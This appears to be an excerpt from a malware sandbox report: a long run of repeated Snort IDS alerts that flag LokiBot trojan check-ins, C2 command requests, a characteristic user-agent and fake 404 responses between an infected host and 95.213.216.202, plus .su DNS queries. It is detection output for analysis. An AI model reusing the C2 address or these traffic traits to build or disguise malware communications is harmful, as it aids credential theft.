            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60625 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49704 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49704 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49704 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49704 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49704 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49704
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49302 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49705 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49705 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49705 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49705 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49705 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49705
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53975 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49706 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49706 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49706 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49706 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49706 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49706
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:51139 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49707 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49707 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49707 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49707 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49707 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49707
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52955 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49708 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49708 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49708 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49708 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49708 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49708
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60582 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49709 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49709 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49709 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49709 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49709 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49709
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57134 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49710 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49710 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49710 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49710 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49710 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49710
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:62050 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49711 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49711 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49711 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49711 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49711 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49711
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:56042 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49712 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49712 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49712 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49712 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49712 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49712
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59636 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49713 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49713 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49713 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49713 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49713 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49713
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:55638 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49714 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49714 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49714 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49714 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49714 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49714
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57704 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49715 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49715 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49715 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49715
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65320 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49716 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49716 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49716 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49716 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49716 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49716
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60767 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49717 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49717 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49717 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49717
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65107 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49718 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49718 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49718 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49718 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49718 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49718
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53848 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49719 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49719
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57571 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49720 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49720
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58691 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49721 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49721
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53305 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49722 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49722 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49722 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49722 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49722 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49722
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59433 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49723 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49723 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49723 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49723 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49723 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49723
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:60749 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49724 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49724 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49724 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49724 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49724 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49724
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:56949 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49725 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49725 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49725 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49725
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52547 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49726 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49726 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49726 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49726
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53844 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49727 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49727 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49727
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65017 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49728 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49728 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49728 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49728
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53466 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49729 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49729 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49729
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57743 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49730 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49730 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49730
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:53623 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49731 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49731 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49731
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:61416 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49732 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49732 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49732
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:65196 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49733 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49733
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:58708 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49734 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49734 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49734
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:59581 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 95.213.216.202:80
